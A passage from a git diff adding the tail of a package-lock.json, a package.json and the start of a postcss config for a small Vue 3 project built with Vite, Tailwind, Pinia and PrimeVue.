"sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==", + "dev": true, + "engines": { + "node": ">=8.6" + }, + "funding": { + "url": "https://github.com/sponsors/jonschlinkert" + } + }, + "node_modules/pify": { + "version": "2.3.0", + "resolved": "https://registry.npmjs.org/pify/-/pify-2.3.0.tgz", + "integrity": "sha512-udgsAY+fTnvv7kI7aaxbqwWNb0AHiB0qBO89PZKPkoTmGOgdbrHDKD+0B2X4uTfJ/FT1R09r9gTsjUjNJotuog==", + "dev": true, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/pinia": { + "version": "2.0.29", + "resolved": "https://registry.npmjs.org/pinia/-/pinia-2.0.29.tgz", + "integrity": "sha512-5z/KpFecq/cIgfeTnulJXldiLcTITRkTe3N58RKYSj0Pc1EdR6oyCdnf5A9jLoVwBqX5LtHhd0kGlpzWvk9oiQ==", + "dependencies": { + "@vue/devtools-api": "^6.4.5", + "vue-demi": "*" + }, + "funding": { + "url": "https://github.com/sponsors/posva" + }, + "peerDependencies": { + "@vue/composition-api": "^1.4.0", + "typescript": ">=4.4.4", + "vue": "^2.6.14 || ^3.2.0" + }, + "peerDependenciesMeta": { + "@vue/composition-api": { + "optional": true + }, + "typescript": { + "optional": true + } + } + }, + "node_modules/pinia/node_modules/vue-demi": { + "version": "0.13.11", + "resolved": "https://registry.npmjs.org/vue-demi/-/vue-demi-0.13.11.tgz", + "integrity": "sha512-IR8HoEEGM65YY3ZJYAjMlKygDQn25D5ajNFNoKh9RSDMQtlzCxtfQjdQgv9jjK+m3377SsJXY8ysq8kLCZL25A==", + "hasInstallScript": true, + "bin": { + "vue-demi-fix": "bin/vue-demi-fix.js", + "vue-demi-switch": "bin/vue-demi-switch.js" + }, + "engines": { + "node": ">=12" + }, + "funding": { + "url": "https://github.com/sponsors/antfu" + }, + "peerDependencies": { + "@vue/composition-api": "^1.0.0-rc.1", + "vue": "^3.0.0-0 || ^2.6.0" + }, + "peerDependenciesMeta": { + "@vue/composition-api": { + "optional": true + } + } + }, + "node_modules/postcss": { + "version": "8.4.38", + "resolved": "https://registry.npmjs.org/postcss/-/postcss-8.4.38.tgz", + "integrity": "sha512-Wglpdk03BSfXkHoQa3b/oulrotAkwrlLDRSOb9D0bN86FdRyE9lppSp33aHNPgBa0JKCoB+drFLZkQoRRYae5A==", + "funding": [ + { + "type": "opencollective", + "url": "https://opencollective.com/postcss/" + }, + { + "type": "tidelift", + "url": "https://tidelift.com/funding/github/npm/postcss" + }, + { + "type": "github", + "url": "https://github.com/sponsors/ai" + } + ], + "dependencies": { + "nanoid": "^3.3.7", + "picocolors": "^1.0.0", + "source-map-js": "^1.2.0" + }, + "engines": { + "node": "^10 || ^12 || >=14" + } + }, + "node_modules/postcss-import": { + "version": "14.1.0", + "resolved": "https://registry.npmjs.org/postcss-import/-/postcss-import-14.1.0.tgz", + "integrity": "sha512-flwI+Vgm4SElObFVPpTIT7SU7R3qk2L7PyduMcokiaVKuWv9d/U+Gm/QAd8NDLuykTWTkcrjOeD2Pp1rMeBTGw==", + "dev": true, + "dependencies": { + "postcss-value-parser": "^4.0.0", + "read-cache": "^1.0.0", + "resolve": "^1.1.7" + }, + "engines": { + "node": ">=10.0.0" + }, + "peerDependencies": { + "postcss": "^8.0.0" + } + }, + "node_modules/postcss-js": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/postcss-js/-/postcss-js-4.0.0.tgz", + "integrity": "sha512-77QESFBwgX4irogGVPgQ5s07vLvFqWr228qZY+w6lW599cRlK/HmnlivnnVUxkjHnCu4J16PDMHcH+e+2HbvTQ==", + "dev": true, + "dependencies": { + "camelcase-css": "^2.0.1" + }, + "engines": { + "node": "^12 || ^14 || >= 16" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/postcss/" + }, + "peerDependencies": { + "postcss": "^8.3.3" + } + }, + "node_modules/postcss-load-config": { + "version": "3.1.4", + "resolved": "https://registry.npmjs.org/postcss-load-config/-/postcss-load-config-3.1.4.tgz", + "integrity": "sha512-6DiM4E7v4coTE4uzA8U//WhtPwyhiim3eyjEMFCnUpzbrkK9wJHgKDT2mR+HbtSrd/NubVaYTOpSpjUl8NQeRg==", + "dev": true, + "dependencies": { + "lilconfig": "^2.0.5", + "yaml": "^1.10.2" + }, + "engines": { + "node": ">= 10" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/postcss/" + }, + "peerDependencies": { + "postcss": ">=8.0.9", + "ts-node": ">=9.0.0" + }, + "peerDependenciesMeta": { + "postcss": { + "optional": true + }, + "ts-node": { + "optional": true + } + } + }, + "node_modules/postcss-nested": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/postcss-nested/-/postcss-nested-6.0.0.tgz", + "integrity": "sha512-0DkamqrPcmkBDsLn+vQDIrtkSbNkv5AD/M322ySo9kqFkCIYklym2xEmWkwo+Y3/qZo34tzEPNUw4y7yMCdv5w==", + "dev": true, + "dependencies": { + "postcss-selector-parser": "^6.0.10" + }, + "engines": { + "node": ">=12.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/postcss/" + }, + "peerDependencies": { + "postcss": "^8.2.14" + } + }, + "node_modules/postcss-selector-parser": { + "version": "6.0.11", + "resolved": "https://registry.npmjs.org/postcss-selector-parser/-/postcss-selector-parser-6.0.11.tgz", + "integrity": "sha512-zbARubNdogI9j7WY4nQJBiNqQf3sLS3wCP4WfOidu+p28LofJqDH1tcXypGrcmMHhDk2t9wGhCsYe/+szLTy1g==", + "dev": true, + "dependencies": { + "cssesc": "^3.0.0", + "util-deprecate": "^1.0.2" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/postcss-value-parser": { + "version": "4.2.0", + "resolved": "https://registry.npmjs.org/postcss-value-parser/-/postcss-value-parser-4.2.0.tgz", + "integrity": "sha512-1NNCs6uurfkVbeXG4S8JFT9t19m45ICnif8zWLd5oPSZ50QnwMfK+H3jv408d4jw/7Bttv5axS5IiHoLaVNHeQ==", + "dev": true + }, + "node_modules/prelude-ls": { + "version": "1.2.1", + "resolved": "https://registry.npmjs.org/prelude-ls/-/prelude-ls-1.2.1.tgz", + "integrity": "sha512-vkcDPrRZo1QZLbn5RLGPpg/WmIQ65qoWWhcGKf/b5eplkkarX0m9z8ppCat4mlOqUsWpyNuYgO3VRyrYHSzX5g==", + "dev": true, + "engines": { + "node": ">= 0.8.0" + } + }, + "node_modules/primevue": { + "version": "3.49.1", + "resolved": "https://registry.npmjs.org/primevue/-/primevue-3.49.1.tgz", + "integrity": "sha512-OmUTqbKbPB63Zqf7uA49cipDi+Qh+/13AYJPwgvsVsI4QmAKIkeibBwkOgj1CNIFlopfF79YmyBshFUAPqlw9A==", + "peerDependencies": { + "vue": "^3.0.0" + } + }, + "node_modules/punycode": { + "version": "2.3.0", + "resolved": "https://registry.npmjs.org/punycode/-/punycode-2.3.0.tgz", + "integrity": "sha512-rRV+zQD8tVFys26lAGR9WUuS4iUAngJScM+ZRSKtvl5tKeZ2t5bvdNFdNHBW9FWR4guGHlgmsZ1G7BSm2wTbuA==", + "dev": true, + "engines": { + "node": ">=6" + } + }, + "node_modules/queue-microtask": { + "version": "1.2.3", + "resolved": "https://registry.npmjs.org/queue-microtask/-/queue-microtask-1.2.3.tgz", + "integrity": "sha512-NuaNSa6flKT5JaSYQzJok04JzTL1CA6aGhv5rfLW3PgqA+M2ChpZQnAC8h8i4ZFkBS8X5RqkDBHA7r4hej3K9A==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ] + }, + "node_modules/quick-lru": { + "version": "5.1.1", + "resolved": "https://registry.npmjs.org/quick-lru/-/quick-lru-5.1.1.tgz", + "integrity": "sha512-WuyALRjWPDGtt/wzJiadO5AXY+8hZ80hVpe6MyivgraREW751X3SbhRvG3eLKOYN+8VEvqLcf3wdnt44Z4S4SA==", + "dev": true, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/read-cache": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/read-cache/-/read-cache-1.0.0.tgz", + "integrity": "sha512-Owdv/Ft7IjOgm/i0xvNDZ1LrRANRfew4b2prF3OWMQLxLfu3bS8FVhCsrSCMK4lR56Y9ya+AThoTpDCTxCmpRA==", + "dev": true, + "dependencies": { + "pify": "^2.3.0" + } + }, + "node_modules/readdirp": { + "version": "3.6.0", + "resolved": "https://registry.npmjs.org/readdirp/-/readdirp-3.6.0.tgz", + "integrity": "sha512-hOS089on8RduqdbhvQ5Z37A0ESjsqz6qnRcffsMU3495FuTdqSm+7bhJ29JvIOsBDEEnan5DPu9t3To9VRlMzA==", + "dev": true, + "dependencies": { + "picomatch": "^2.2.1" + }, + "engines": { + "node": ">=8.10.0" + } + }, + "node_modules/regexpp": { + "version": "3.2.0", + "resolved": "https://registry.npmjs.org/regexpp/-/regexpp-3.2.0.tgz", + "integrity": "sha512-pq2bWo9mVD43nbts2wGv17XLiNLya+GklZ8kaDLV2Z08gDCsGpnKn9BFMepvWuHCbyVvY7J5o5+BVvoQbmlJLg==", + "dev": true, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/sponsors/mysticatea" + } + }, + "node_modules/resolve": { + "version": "1.22.1", + "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.1.tgz", + "integrity": "sha512-nBpuuYuY5jFsli/JIs1oldw6fOQCBioohqWZg/2hiaOybXOft4lonv85uDOKXdf8rhyK159cxU5cDcK/NKk8zw==", + "dev": true, + "dependencies": { + "is-core-module": "^2.9.0", + "path-parse": "^1.0.7", + "supports-preserve-symlinks-flag": "^1.0.0" + }, + "bin": { + "resolve": "bin/resolve" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/resolve-from": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/resolve-from/-/resolve-from-4.0.0.tgz", + "integrity": "sha512-pb/MYmXstAkysRFx8piNI1tGFNQIFA3vkE3Gq4EuA1dF6gHp/+vgZqsCGJapvy8N3Q+4o7FwvquPJcnZ7RYy4g==", + "dev": true, + "engines": { + "node": ">=4" + } + }, + "node_modules/reusify": { + "version": "1.0.4", + "resolved": "https://registry.npmjs.org/reusify/-/reusify-1.0.4.tgz", + "integrity": "sha512-U9nH88a3fc/ekCF1l0/UP1IosiuIjyTh7hBvXVMHYgVcfGvt897Xguj2UOLDeI5BG2m7/uwyaLVT6fbtCwTyzw==", + "dev": true, + "engines": { + "iojs": ">=1.0.0", + "node": ">=0.10.0" + } + }, + "node_modules/rimraf": { + "version": "3.0.2", + "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-3.0.2.tgz", + "integrity": "sha512-JZkJMZkAGFFPP2YqXZXPbMlMBgsxzE8ILs4lMIX/2o0L9UBw9O/Y3o6wFw/i9YLapcUJWwqbi3kdxIPdC62TIA==", + "dev": true, + "dependencies": { + "glob": "^7.1.3" + }, + "bin": { + "rimraf": "bin.js" + }, + "funding": { + "url": "https://github.com/sponsors/isaacs" + } + }, + "node_modules/rollup": { + "version": "3.29.4", + "resolved": "https://registry.npmjs.org/rollup/-/rollup-3.29.4.tgz", + "integrity": "sha512-oWzmBZwvYrU0iJHtDmhsm662rC15FRXmcjCk1xD771dFDx5jJ02ufAQQTn0etB2emNk4J9EZg/yWKpsn9BWGRw==", + "dev": true, + "bin": { + "rollup": "dist/bin/rollup" + }, + "engines": { + "node": ">=14.18.0", + "npm": ">=8.0.0" + }, + "optionalDependencies": { + "fsevents": "~2.3.2" + } + }, + "node_modules/run-parallel": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/run-parallel/-/run-parallel-1.2.0.tgz", + "integrity": "sha512-5l4VyZR86LZ/lDxZTR6jqL8AFE2S0IFLMP26AbjsLVADxHdhB/c0GUsH+y39UfCi3dzz8OlQuPmnaJOMoDHQBA==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ], + "dependencies": { + "queue-microtask": "^1.2.2" + } + }, + "node_modules/semver": { + "version": "7.6.0", + "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.0.tgz", + "integrity": "sha512-EnwXhrlwXMk9gKu5/flx5sv/an57AkRplG3hTK68W7FRDN+k+OWBj65M7719OkA82XLBxrcX0KSHj+X5COhOVg==", + "dev": true, + "dependencies": { + "lru-cache": "^6.0.0" + }, + "bin": { + "semver": "bin/semver.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/shebang-command": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/shebang-command/-/shebang-command-2.0.0.tgz", + "integrity": "sha512-kHxr2zZpYtdmrN1qDjrrX/Z1rR1kG8Dx+gkpK1G4eXmvXswmcE1hTWBWYUzlraYw1/yZp6YuDY77YtvbN0dmDA==", + "dev": true, + "dependencies": { + "shebang-regex": "^3.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/shebang-regex": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/shebang-regex/-/shebang-regex-3.0.0.tgz", + "integrity": "sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A==", + "dev": true, + "engines": { + "node": ">=8" + } + }, + "node_modules/slash": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/slash/-/slash-3.0.0.tgz", + "integrity": "sha512-g9Q1haeby36OSStwb4ntCGGGaKsaVSjQ68fBxoQcutl5fS1vuY18H3wSt3jFyFtrkx+Kz0V1G85A4MyAdDMi2Q==", + "dev": true, + "engines": { + "node": ">=8" + } + }, + "node_modules/source-map": { + "version": "0.6.1", + "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.6.1.tgz", + "integrity": "sha512-UjgapumWlbMhkBgzT7Ykc5YXUT46F0iKu8SGXq0bcwP5dz/h0Plj6enJqjz1Zbq2l5WaqYnrVbwWOWMyF3F47g==", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/source-map-js": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/source-map-js/-/source-map-js-1.2.0.tgz", + "integrity": "sha512-itJW8lvSA0TXEphiRoawsCksnlf8SyvmFzIhltqAHluXd88pkCd+cXJVHTDwdCr0IzwptSm035IHQktUu1QUMg==", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/sourcemap-codec": { + "version": "1.4.8", + "resolved": "https://registry.npmjs.org/sourcemap-codec/-/sourcemap-codec-1.4.8.tgz", + "integrity": "sha512-9NykojV5Uih4lgo5So5dtw+f0JgJX30KCNI8gwhz2J9A15wD0Ml6tjHKwf6fTSa6fAdVBdZeNOs9eJ71qCk8vA==", + "deprecated": "Please use @jridgewell/sourcemap-codec instead" + }, + "node_modules/strip-ansi": { + "version": "6.0.1", + "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", + "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", + "dev": true, + "dependencies": { + "ansi-regex": "^5.0.1" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/strip-json-comments": { + "version": "3.1.1", + "resolved": "https://registry.npmjs.org/strip-json-comments/-/strip-json-comments-3.1.1.tgz", + "integrity": "sha512-6fPc+R4ihwqP6N/aIv2f1gMH8lOVtWQHoqC4yK6oSDVVocumAsfCqjkXnqiYMhmMwS/mEHLp7Vehlt3ql6lEig==", + "dev": true, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/supports-color": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", + "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", + "dev": true, + "dependencies": { + "has-flag": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/supports-preserve-symlinks-flag": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", + "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==", + "dev": true, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/tailwindcss": { + "version": "3.2.4", + "resolved": "https://registry.npmjs.org/tailwindcss/-/tailwindcss-3.2.4.tgz", + "integrity": "sha512-AhwtHCKMtR71JgeYDaswmZXhPcW9iuI9Sp2LvZPo9upDZ7231ZJ7eA9RaURbhpXGVlrjX4cFNlB4ieTetEb7hQ==", + "dev": true, + "dependencies": { + "arg": "^5.0.2", + "chokidar": "^3.5.3", + "color-name": "^1.1.4", + "detective": "^5.2.1", + "didyoumean": "^1.2.2", + "dlv": "^1.1.3", + "fast-glob": "^3.2.12", + "glob-parent": "^6.0.2", + "is-glob": "^4.0.3", + "lilconfig": "^2.0.6", + "micromatch": "^4.0.5", + "normalize-path": "^3.0.0", + "object-hash": "^3.0.0", + "picocolors": "^1.0.0", + "postcss": "^8.4.18", + "postcss-import": "^14.1.0", + "postcss-js": "^4.0.0", + "postcss-load-config": "^3.1.4", + "postcss-nested": "6.0.0", + "postcss-selector-parser": "^6.0.10", + "postcss-value-parser": "^4.2.0", + "quick-lru": "^5.1.1", + "resolve": "^1.22.1" + }, + "bin": { + "tailwind": "lib/cli.js", + "tailwindcss": "lib/cli.js" + }, + "engines": { + "node": ">=12.13.0" + }, + "peerDependencies": { + "postcss": "^8.0.9" + } + }, + "node_modules/text-table": { + "version": "0.2.0", + "resolved": "https://registry.npmjs.org/text-table/-/text-table-0.2.0.tgz", + "integrity": "sha512-N+8UisAXDGk8PFXP4HAzVR9nbfmVJ3zYLAWiTIoqC5v5isinhr+r5uaO8+7r3BMfuNIufIsA7RdpVgacC2cSpw==", + "dev": true + }, + "node_modules/to-regex-range": { + "version": "5.0.1", + "resolved": "https://registry.npmjs.org/to-regex-range/-/to-regex-range-5.0.1.tgz", + "integrity": "sha512-65P7iz6X5yEr1cwcgvQxbbIw7Uk3gOy5dIdtZ4rDveLqhrdJP+Li/Hx6tyK0NEb+2GCyneCMJiGqrADCSNk8sQ==", + "dev": true, + "dependencies": { + "is-number": "^7.0.0" + }, + "engines": { + "node": ">=8.0" + } + }, + "node_modules/tslib": { + "version": "1.14.1", + "resolved": "https://registry.npmjs.org/tslib/-/tslib-1.14.1.tgz", + "integrity": "sha512-Xni35NKzjgMrwevysHTCArtLDpPvye8zV/0E4EyYn43P7/7qvQwPh9BGkHewbMulVntbigmcT7rdX3BNo9wRJg==", + "dev": true + }, + "node_modules/tsutils": { + "version": "3.21.0", + "resolved": "https://registry.npmjs.org/tsutils/-/tsutils-3.21.0.tgz", + "integrity": "sha512-mHKK3iUXL+3UF6xL5k0PEhKRUBKPBCv/+RkEOpjRWxxx27KKRBmmA60A9pgOUvMi8GKhRMPEmjBRPzs2W7O1OA==", + "dev": true, + "dependencies": { + "tslib": "^1.8.1" + }, + "engines": { + "node": ">= 6" + }, + "peerDependencies": { + "typescript": ">=2.8.0 || >= 3.2.0-dev || >= 3.3.0-dev || >= 3.4.0-dev || >= 3.5.0-dev || >= 3.6.0-dev || >= 3.6.0-beta || >= 3.7.0-dev || >= 3.7.0-beta" + } + }, + "node_modules/type-check": { + "version": "0.4.0", + "resolved": "https://registry.npmjs.org/type-check/-/type-check-0.4.0.tgz", + "integrity": "sha512-XleUoc9uwGXqjWwXaUTZAmzMcFZ5858QA2vvx1Ur5xIcixXIP+8LnFDgRplU30us6teqdlskFfu+ae4K79Ooew==", + "dev": true, + "dependencies": { + "prelude-ls": "^1.2.1" + }, + "engines": { + "node": ">= 0.8.0" + } + }, + "node_modules/type-fest": { + "version": "0.20.2", + "resolved": "https://registry.npmjs.org/type-fest/-/type-fest-0.20.2.tgz", + "integrity": "sha512-Ne+eE4r0/iWnpAxD852z3A+N0Bt5RN//NjJwRd2VFHEmrywxf5vsZlh4R6lixl6B+wz/8d+maTSAkN1FIkI3LQ==", + "dev": true, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/typescript": { + "version": "4.7.4", + "resolved": "https://registry.npmjs.org/typescript/-/typescript-4.7.4.tgz", + "integrity": "sha512-C0WQT0gezHuw6AdY1M2jxUO83Rjf0HP7Sk1DtXj6j1EwkQNZrHAg2XPWlq62oqEhYvONq5pkC2Y9oPljWToLmQ==", + "devOptional": true, + "bin": { + "tsc": "bin/tsc", + "tsserver": "bin/tsserver" + }, + "engines": { + "node": ">=4.2.0" + } + }, + "node_modules/update-browserslist-db": { + "version": "1.0.10", + "resolved": "https://registry.npmjs.org/update-browserslist-db/-/update-browserslist-db-1.0.10.tgz", + "integrity": "sha512-OztqDenkfFkbSG+tRxBeAnCVPckDBcvibKd35yDONx6OU8N7sqgwc7rCbkJ/WcYtVRZ4ba68d6byhC21GFh7sQ==", + "dev": true, + "funding": [ + { + "type": "opencollective", + "url": "https://opencollective.com/browserslist" + }, + { + "type": "tidelift", + "url": "https://tidelift.com/funding/github/npm/browserslist" + } + ], + "dependencies": { + "escalade": "^3.1.1", + "picocolors": "^1.0.0" + }, + "bin": { + "browserslist-lint": "cli.js" + }, + "peerDependencies": { + "browserslist": ">= 4.21.0" + } + }, + "node_modules/uri-js": { + "version": "4.4.1", + "resolved": "https://registry.npmjs.org/uri-js/-/uri-js-4.4.1.tgz", + "integrity": "sha512-7rKUyy33Q1yc98pQ1DAmLtwX109F7TIfWlW1Ydo8Wl1ii1SeHieeh0HHfPeL2fMXK6z0s8ecKs9frCuLJvndBg==", + "dev": true, + "dependencies": { + "punycode": "^2.1.0" + } + }, + "node_modules/util-deprecate": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/util-deprecate/-/util-deprecate-1.0.2.tgz", + "integrity": "sha512-EPD5q1uXyFxJpCrLnCc1nHnq3gOa6DZBocAIiI2TaSCA7VCJ1UJDMagCzIkXNsUYfD1daK//LTEQ8xiIbrHtcw==", + "dev": true + }, + "node_modules/vite": { + "version": "4.5.3", + "resolved": "https://registry.npmjs.org/vite/-/vite-4.5.3.tgz", + "integrity": "sha512-kQL23kMeX92v3ph7IauVkXkikdDRsYMGTVl5KY2E9OY4ONLvkHf04MDTbnfo6NKxZiDLWzVpP5oTa8hQD8U3dg==", + "dev": true, + "dependencies": { + "esbuild": "^0.18.10", + "postcss": "^8.4.27", + "rollup": "^3.27.1" + }, + "bin": { + "vite": "bin/vite.js" + }, + "engines": { + "node": "^14.18.0 || >=16.0.0" + }, + "funding": { + "url": "https://github.com/vitejs/vite?sponsor=1" + }, + "optionalDependencies": { + "fsevents": "~2.3.2" + }, + "peerDependencies": { + "@types/node": ">= 14", + "less": "*", + "lightningcss": "^1.21.0", + "sass": "*", + "stylus": "*", + "sugarss": "*", + "terser": "^5.4.0" + }, + "peerDependenciesMeta": { + "@types/node": { + "optional": true + }, + "less": { + "optional": true + }, + "lightningcss": { + "optional": true + }, + "sass": { + "optional": true + }, + "stylus": { + "optional": true + }, + "sugarss": { + "optional": true + }, + "terser": { + "optional": true + } + } + }, + "node_modules/vue": { + "version": "3.2.45", + "resolved": "https://registry.npmjs.org/vue/-/vue-3.2.45.tgz", + "integrity": "sha512-9Nx/Mg2b2xWlXykmCwiTUCWHbWIj53bnkizBxKai1g61f2Xit700A1ljowpTIM11e3uipOeiPcSqnmBg6gyiaA==", + "dependencies": { + "@vue/compiler-dom": "3.2.45", + "@vue/compiler-sfc": "3.2.45", + "@vue/runtime-dom": "3.2.45", + "@vue/server-renderer": "3.2.45", + "@vue/shared": "3.2.45" + } + }, + "node_modules/vue-eslint-parser": { + "version": "9.1.0", + "resolved": "https://registry.npmjs.org/vue-eslint-parser/-/vue-eslint-parser-9.1.0.tgz", + "integrity": "sha512-NGn/iQy8/Wb7RrRa4aRkokyCZfOUWk19OP5HP6JEozQFX5AoS/t+Z0ZN7FY4LlmWc4FNI922V7cvX28zctN8dQ==", + "dev": true, + "dependencies": { + "debug": "^4.3.4", + "eslint-scope": "^7.1.1", + "eslint-visitor-keys": "^3.3.0", + "espree": "^9.3.1", + "esquery": "^1.4.0", + "lodash": "^4.17.21", + "semver": "^7.3.6" + }, + "engines": { + "node": "^14.17.0 || >=16.0.0" + }, + "funding": { + "url": "https://github.com/sponsors/mysticatea" + }, + "peerDependencies": { + "eslint": ">=6.0.0" + } + }, + "node_modules/vue-router": { + "version": "4.1.6", + "resolved": "https://registry.npmjs.org/vue-router/-/vue-router-4.1.6.tgz", + "integrity": "sha512-DYWYwsG6xNPmLq/FmZn8Ip+qrhFEzA14EI12MsMgVxvHFDYvlr4NXpVF5hrRH1wVcDP8fGi5F4rxuJSl8/r+EQ==", + "dependencies": { + "@vue/devtools-api": "^6.4.5" + }, + "funding": { + "url": "https://github.com/sponsors/posva" + }, + "peerDependencies": { + "vue": "^3.2.0" + } + }, + "node_modules/which": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/which/-/which-2.0.2.tgz", + "integrity": "sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA==", + "dev": true, + "dependencies": { + "isexe": "^2.0.0" + }, + "bin": { + "node-which": "bin/node-which" + }, + "engines": { + "node": ">= 8" + } + }, + "node_modules/word-wrap": { + "version": "1.2.5", + "resolved": "https://registry.npmjs.org/word-wrap/-/word-wrap-1.2.5.tgz", + "integrity": "sha512-BN22B5eaMMI9UMtjrGd5g5eCYPpCPDUy0FJXbYsaT5zYxjFOckS53SQDE3pWkVoWpHXVb3BrYcEN4Twa55B5cA==", + "dev": true, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/wrappy": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", + "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==", + "dev": true + }, + "node_modules/xml-name-validator": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/xml-name-validator/-/xml-name-validator-4.0.0.tgz", + "integrity": "sha512-ICP2e+jsHvAj2E2lIHxa5tjXRlKDJo4IdvPvCXbXQGdzSfmSpNVyIKMvoZHjDY9DP0zV17iI85o90vRFXNccRw==", + "dev": true, + "engines": { + "node": ">=12" + } + }, + "node_modules/xtend": { + "version": "4.0.2", + "resolved": "https://registry.npmjs.org/xtend/-/xtend-4.0.2.tgz", + "integrity": "sha512-LKYU1iAXJXUgAXn9URjiu+MWhyUXHsvfp7mcuYm9dSUKK0/CjtrUwFAxD82/mCWbtLsGjFIad0wIsod4zrTAEQ==", + "dev": true, + "engines": { + "node": ">=0.4" + } + }, + "node_modules/yallist": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", + "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==", + "dev": true + }, + "node_modules/yaml": { + "version": "1.10.2", + "resolved": "https://registry.npmjs.org/yaml/-/yaml-1.10.2.tgz", + "integrity": "sha512-r3vXyErRCYJ7wg28yvBY5VSoAF8ZvlcW9/BwUzEtUsjvX/DKs24dIkuwjtuprwJJHsbyUbLApepYTR1BN4uHrg==", + "dev": true, + "engines": { + "node": ">= 6" + } + }, + "node_modules/yocto-queue": { + "version": "0.1.0", + "resolved": "https://registry.npmjs.org/yocto-queue/-/yocto-queue-0.1.0.tgz", + "integrity": "sha512-rVksvsnNCdJ/ohGc6xgPwyN8eheCxsiLM8mxuE/t/mOVqJewPuO1miLpTHQiRgTKCLexL4MeAFVagts7HmNZ2Q==", + "dev": true, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + } + } +} diff --git a/package.json b/package.json new file mode 100644 index 0000000..a91781b --- /dev/null +++ b/package.json @@ -0,0 +1,29 @@ +{ + "name": "simple-project", + "version": "0.0.0", + "scripts": { + "dev": "vite", + "build": "vite build", + "preview": "vite preview --port 4173", + "lint": "eslint . --ext .vue,.js,.jsx,.cjs,.mjs --fix --ignore-path .gitignore" + }, + "dependencies": { + "pinia": "^2.0.29", + "primevue": "^3.49.1", + "vue": "^3.2.37", + "vue-router": "^4.1.6" + }, + "devDependencies": { + "@rushstack/eslint-patch": "^1.1.0", + "@typescript-eslint/eslint-plugin": "^5.4.0", + "@typescript-eslint/parser": "^5.4.0", + "@vitejs/plugin-vue": "^4.0.0", + "autoprefixer": "^10.4.7", + "eslint": "^8.5.0", + "eslint-plugin-vue": "^9.0.0", + "postcss": "^8.4.14", + "tailwindcss": "^3.1.4", + "typescript": "4.7", + "vite": "^4.0.4" + } +} diff --git a/postcss.config.js b/postcss.config.js new file mode 100644 index 0000000..9f23996 --- /dev/null +++ b/postcss.config.js 